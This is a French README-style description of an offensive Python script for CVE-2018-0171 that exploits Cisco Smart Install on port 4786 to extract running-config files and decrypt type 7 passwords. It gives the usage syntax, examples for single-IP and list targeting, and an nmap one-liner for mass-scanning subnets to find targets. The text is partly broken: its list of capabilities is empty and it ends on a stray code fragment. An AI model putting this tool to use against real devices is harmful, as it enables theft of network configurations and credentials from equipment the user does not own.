
Exploit Cisco SmartInstall [CVE-2018-0171]
Exploit Cisco SmartInstall CVE-2018-0171
Inspiré du PoC de C. Papathanasiou
Ce script Python 3 utilise le port 4786 sur un équipement Cisco exécutant SmartInstall pour exploiter CVE-2018-0171. Grâce à cet exploit, un attaquant peut fabriquer une charge utile, l'envoyer à l'équipement Cisco, puis extraire le contenu du fichier running-config.
Le script Cisco Smart Exploit peut :

Voici la liste des prérequis pour utiliser le script :
tftpy==0.8.2c7decrypt pour le décryptage secret 7
gem install c7decrypt __ __ __ __ __ __ ___ ___ __ __ ___
/ ` | /__` / ` / \ /__` |\/| /\ |__) | |__ \_/ |__) | / \ | |
\__, | .__/ \__, \__/ .__/ | | /~~\ | \ | |___ / \ | |___ \__/ | |
by @AlrikRr
usage: cisco-se.py [-h] (-i IP | -f FILE | -c CONFIG)
optional arguments:
-h, --help show this help message and exit
-i IP Single IP Address
-f FILE File that contains IP list
-c CONFIG running-config File standalone
Exemples :
python3 cisco-se.py -i 192.168.10.1
python3 cisco-se.py -f ip_list.txt
python3 cisco-se.py -c running-config.txt
Pour l'option -f FILE, voici un exemple utilisant nmap :
nmap -p 4786 10.20.30.0/24 --open -Pn -oG - | awk '/Up$/{print $2}' > ip_list.txt
client.download()